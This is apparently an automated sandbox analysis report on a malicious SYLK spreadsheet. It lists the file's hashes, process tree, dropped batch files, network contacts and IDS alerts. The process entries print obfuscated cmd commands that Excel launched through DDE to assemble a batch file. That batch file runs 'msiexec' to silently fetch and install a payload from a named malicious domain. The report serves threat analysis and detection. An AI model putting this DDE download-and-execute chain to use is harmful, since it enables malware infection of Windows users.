File name: | William Buckner.slk |
Full analysis: | https://app.any.run/tasks/6f7a2771-2dda-467f-9664-272dc09e4f5c |
Verdict: | Malicious activity |
Analysis date: | March 31, 2020, 02:39:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF line terminators, with escape sequences |
MD5: | 8078FB812CB506CE08F371A936F666D4 |
SHA1: | 0A962AD121E96C2BA4D51761E55CDBE9C4DC4082 |
SHA256: | 5F43A9F10FE23D562397A812FDB6B4969F7158D2D45480B36224DC9821072A3D |
SSDEEP: | 48:Us0ZUdZhdqBbJkrKlL4mDAezvIondzHjiPAdHi8AdHW82d0HXWINmqNRCcCp3u0s:yOdPdqBbJNn1zOACgT3qL2i |
.slk | | | SYLK - SYmbolic LinK data (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3376 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
2420 | Cmd.exe /c EChO|SEt /p="@echo off&wm^ic pro^ces^s c^all cr^eat^e 'Ms">%temp%\wvFXE.b^a^t | C:\Windows\system32\Cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1248 | Cmd.exe /c @echo off&pi^ng 43 -n 1&echo|set /p="iexec /ihttp^:^/^/^dersh">>%temp%\wvFXE.b^a^t | C:\Windows\system32\Cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
660 | cmd.exe /c @echo off&pi^ng 43 -n 3&echo|set /p="ov.com/407.php ">>%temp%\wvFXE.b^a^t | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3300 | cmd.exe /c @echo off&pi^ng 43 -n 5&echo|set /p=" ^/q'">>%temp%\wvFXE.bat&%temp%\wvFXE.b^a^t | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2380 | ping 43 -n 1 | C:\Windows\system32\PING.EXE | — | Cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2824 | C:\Windows\system32\cmd.exe /S /D /c" EChO" | C:\Windows\system32\cmd.exe | — | Cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2816 | C:\Windows\system32\cmd.exe /S /D /c" SEt /p="@echo off&wm^ic pro^ces^s c^all cr^eat^e 'Ms" 1>C:\Users\admin\AppData\Local\Temp\wvFXE.bat" | C:\Windows\system32\cmd.exe | — | Cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2868 | ping 43 -n 3 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3144 | ping 43 -n 5 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3376 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6C5E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
620 | cmd.exe | C:\Users\admin\AppData\Local\Temp\wvFXE.bat | text | |
MD5:C68751154B8DAB352576F3CB5896B7CA | SHA256:5E6904C3BC949B51B075A644063F4BB88AD4B0DB0EA38F48878AD307247F2A20 | |||
1832 | cmd.exe | C:\Users\admin\AppData\Local\Temp\wvFXE.bat | text | |
MD5:0B41C16F13186E319A0DAF3F557479FB | SHA256:11BE562FDB8F0A5B7427DF52E83E3889D43AB2A4C1231599AEFA62E147D1BC16 | |||
2816 | cmd.exe | C:\Users\admin\AppData\Local\Temp\wvFXE.bat | text | |
MD5:0B41C16F13186E319A0DAF3F557479FB | SHA256:11BE562FDB8F0A5B7427DF52E83E3889D43AB2A4C1231599AEFA62E147D1BC16 | |||
3176 | cmd.exe | C:\Users\admin\AppData\Local\Temp\wvFXE.bat | text | |
MD5:D348279FDD84AD8CFEACE44F4DBBC193 | SHA256:450A02C8FD5E2E89AAC22B2EEE386154EDDC2D6A71F0109030F99CA96632DD9E |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2400 | msiexec.exe | GET | — | 198.54.117.218:80 | http://www.dershov.com/407.php?from=@ | US | — | — | malicious |
2400 | msiexec.exe | GET | 302 | 192.64.119.126:80 | http://dershov.com/407.php | US | html | 60 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2400 | msiexec.exe | 192.64.119.126:80 | dershov.com | Namecheap, Inc. | US | suspicious |
2400 | msiexec.exe | 198.54.117.218:80 | www.dershov.com | Namecheap, Inc. | US | malicious |
Domain | IP | Reputation |
---|---|---|
dershov.com |
| malicious |
www.dershov.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2400 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file |
2400 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file |